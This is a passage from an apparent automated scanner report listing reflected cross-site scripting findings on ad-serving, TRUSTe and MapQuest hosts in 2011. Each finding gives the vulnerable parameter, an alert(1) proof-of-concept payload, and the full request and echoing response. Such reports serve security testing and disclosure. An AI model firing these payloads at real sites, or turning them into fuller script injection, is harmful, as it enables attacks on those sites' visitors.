50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=1ee58";alert(1)//1bf6f78cd31http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.61. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpck parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 597ce"%3balert(1)//1b506363a98 was submitted in the mpck parameter. This input was echoed as 597ce";alert(1)//1b506363a98 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609597ce"%3balert(1)//1b506363a98&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link= HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:54 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=http://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609597ce";alert(1)//1b506363a98&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d
...[SNIP]...

5.62. http://cdn4.eyewonder.com/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js [mpvc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://cdn4.eyewonder.com
Path:	/content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95ff2"%3balert(1)//a4f03f74c1f was submitted in the mpvc parameter. This input was echoed as 95ff2";alert(1)//a4f03f74c1f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /content/0/10295/119241/AOL-300-250-ATM_COVERAGE_300x250_v1_r1-Banner-1420653.js?mpck=cdn4.eyewonder.com%2Fcm%2Fck%2F10295-119241-2568-4%3Fmpt%3D599154609&mpt=599154609&mpvc=http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile%2Eaol%2Fproduct%2Fiphone%2Fdaily%2Dfinance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312;kvmn=93241795;kvtid=16r4opq1tvlkml;kr2703=77796;kvseg=99999:51134:50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2"%3balert(1)//a4f03f74c1f HTTP/1.1
Host: cdn4.eyewonder.com
Proxy-Connection: keep-alive
Referer: http://mobile.aol.com/product/iPhone/daily-finance/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: svid=46431933753; mojo3=10295:2568/17671:21707

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 12:39:56 GMT
Server: Apache
Last-Modified: Mon, 24 Jan 2011 22:37:34 GMT
ETag: "59bffc-2ff-49a9f3efba780"
Accept-Ranges: bytes
Content-Length: 2303
Content-Type: application/x-javascript

var failclickTag_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/product/iphone/daily-finance;kvugc=0;kvui=f49ac58470c911e0ba8373d1f2b58312
...[SNIP]...
50086:50085:53380:60490:60512:50963:52615:60491:50507:53656:55401:60509:57094:50961:52841:51182:56419:54032:51186:56988:56673:56148:57362:56969:60203:56835:56987:56780:50220;kp=92038;nodecode=yes;link=95ff2";alert(1)//a4f03f74c1fhttp://cdn4.eyewonder.com/cm/ck/10295-119241-2568-4?mpt=599154609&6830830=0";
var clickTag1_1420653 = "http://at.atwola.com/adlink/5113/675309/0/170/AdId=1360646;BnId=6;itime=599154609;kvpg=mobile.aol/
...[SNIP]...

5.63. http://choices.truste.com/ca [c parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the c request parameter is copied into the HTML document as plain text between tags. The payload 977b3<script>alert(1)</script>5107276f391 was submitted in the c parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1977b3<script>alert(1)</script>5107276f391&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4472

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
baseName] = bindings;
   }
}

   // prototypes
   String.prototype.equalsIgnoreCase = function(arg) {
       return (new String(this.toLowerCase()) == (new String(arg)).toLowerCase());
   }

   var te_clr1_att02cont1977b3<script>alert(1)</script>5107276f391_ib = '<div id="te-clr1-att02cont1977b3<script>
...[SNIP]...

5.64. http://choices.truste.com/ca [h parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the h request parameter is copied into the HTML document as plain text between tags. The payload 59666<script>alert(1)</script>9f57f5bbf8 was submitted in the h parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=25059666<script>alert(1)</script>9f57f5bbf8&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4121

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':25059666<script>alert(1)</script>9f57f5bbf8,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1'
...[SNIP]...

5.65. http://choices.truste.com/ca [iplc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the iplc request parameter is copied into the HTML document as plain text between tags. The payload 6c672<script>alert(1)</script>96972f9f81a was submitted in the iplc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr&iplc=ctr6c672<script>alert(1)</script>96972f9f81a HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr6c672<script>alert(1)</script>96972f9f81a','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://choices.trust
...[SNIP]...

5.66. http://choices.truste.com/ca [ox parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the ox request parameter is copied into the HTML document as plain text between tags. The payload 92b40<script>alert(1)</script>42ea5cf0318 was submitted in the ox parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=2092b40<script>alert(1)</script>42ea5cf0318&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':2092b40<script>alert(1)</script>42ea5cf0318,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','notice
...[SNIP]...

5.67. http://choices.truste.com/ca [plc parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the plc request parameter is copied into the HTML document as plain text between tags. The payload 9fcac<script>alert(1)</script>5500482d71b was submitted in the plc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002&plc=tr9fcac<script>alert(1)</script>5500482d71b&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div>\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':300,'height':250,'ox':20,'oy':0,'plc':'tr9fcac<script>alert(1)</script>5500482d71b','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId':'att02cont1','noticeBaseUrl':'http://
...[SNIP]...

5.68. http://choices.truste.com/ca [w parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the w request parameter is copied into the HTML document as plain text between tags. The payload 94668<script>alert(1)</script>e6e4c609a49 was submitted in the w parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=30094668<script>alert(1)</script>e6e4c609a49&h=250&ox=20&zi=10002&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:20 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 4122

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
</div> \
\
';

   var te_clr1_att02cont1_bi = {'baseName':'te-clr1-att02cont1','anchName':'te-clr1-att02cont1-anch','width':30094668<script>alert(1)</script>e6e4c609a49,'height':250,'ox':20,'oy':0,'plc':'tr','iplc':'ctr','intDivName':'te-clr1-att02cont1-itl','iconSpanId':'te-clr1-att02cont1-icon','backgroundColor':'white','opacity':.8,'filterOpacity':80,'containerId'
...[SNIP]...

5.69. http://choices.truste.com/ca [zi parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://choices.truste.com
Path:	/ca

Issue detail

The value of the zi request parameter is copied into the HTML document as plain text between tags. The payload e18f7<script>alert(1)</script>1968cdcc2c0 was submitted in the zi parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ca?pid=mec01&aid=att02&cid=0311wl300x250&c=att02cont1&w=300&h=250&ox=20&zi=10002e18f7<script>alert(1)</script>1968cdcc2c0&plc=tr&iplc=ctr HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/319709115/direct;wi.300;hi.250/01/557142160?click=http://at.atwola.com/adlink/5113/2011664/0/170/AdId=1661022;BnId=2;itime=557142160;kvpg=huffingtonpost;kvugc=0;kvmn=93313563;kvtid=16r4opq1tvlkml;kr2703=329298;kvseg=99999:51134:53380:60490:60512:50963:52615:60491:50507:53656:55401:57094:50961:52841:51182:56419:51186:56673:56148:57362:56969:56835:60203:56681:56780:50220:56768:56299:56761:56987:54057;kp=115693;nodecode=yes;link=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 01:00:21 GMT
Server: Apache/2.2.14 (Ubuntu)
P3P: policyref="http://choices.truste.com/w3c/p3p.xml", CP="NON DSP COR NID CURa ADMo DEVo TAIo PSAo PSDo OUR DELo BUS IND UNI PUR COM NAV INT DEM"
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Content-Type: text/javascript
Content-Length: 3980

if (typeof truste == "undefined" || !truste) {
   var truste= {};
   truste.ca= {};
   truste.ca.listeners = {};
   truste.img = new Image(1,1);
   truste.defjsload = false;

   truste.ca.txl = {
       'object' : [{'
...[SNIP]...
overlay(te_clr1_att02cont1_bi)','icon':'http://choices.truste.com/assets/admarker.png','icon_cam':'http://choices.truste.com/assets/adicon.png','iconText':'','aid':'att02','pid':'mec01','zindex':'10002e18f7<script>alert(1)</script>1968cdcc2c0','cam':'2'};

   var tecabaseurl = 'choices.truste.com';

   truste.ca.addEvent(window, 'load', function() {
       if(!truste.defjsload) {
           var element = document.createElement('script');
           element.src = '
...[SNIP]...

5.70. http://coverage.mqcdn.com/coverage [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://coverage.mqcdn.com
Path:	/coverage

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ed476<script>alert(1)</script>54ce9dc2f2f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverageed476<script>alert(1)</script>54ce9dc2f2f?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/html
Content-Length: 247

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /coverageed476<script>alert(1)</script>54ce9dc2f2f was not found on this server.</p>
...[SNIP]...

5.71. http://coverage.mqcdn.com/coverage [cat parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://coverage.mqcdn.com
Path:	/coverage

Issue detail

The value of the cat request parameter is copied into the HTML document as plain text between tags. The payload a9775<script>alert(1)</script>de994233d1b was submitted in the cat parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csata9775<script>alert(1)</script>de994233d1b HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 400 BAD REQUEST
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/plain
Content-Length: 46

'sata9775<script>alert(1)</script>de994233d1b'

5.72. http://coverage.mqcdn.com/coverage [jsonp parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://coverage.mqcdn.com
Path:	/coverage

Issue detail

The value of the jsonp request parameter is copied into the HTML document as plain text between tags. The payload 4ce5e<script>alert(1)</script>96b4cb561f0 was submitted in the jsonp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /coverage?format=json&jsonp=MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0&loc=-96.97,32.64,-96.63,32.93&zoom=11&projection=sm&cat=map%2Chyb%2Csat HTTP/1.1
Host: coverage.mqcdn.com
Proxy-Connection: keep-alive
Referer: http://www.mapquest.com/?ncid=txtlnkmqmq00000001
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 05 May 2011 00:57:11 GMT
Server: Apache/2.2.13 (Unix) mod_ssl/2.2.13 OpenSSL/0.9.8e-fips-rhel5 mod_wsgi/2.5 Python/2.6.2
Connection: close
Content-Type: text/javascript
Content-Length: 1138

MQA._covCallback4ce5e<script>alert(1)</script>96b4cb561f0({"map": [{"opt": false, "copyrights": [{"text": "NAVTEQ", "html": "<img align='top' src='http://tile21.mqcdn.com/res/ntcopy_dark.gif' width='45' height='11' class='mqacopyswitch mqacopyswitchdark'>
...[SNIP]...

5.73. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
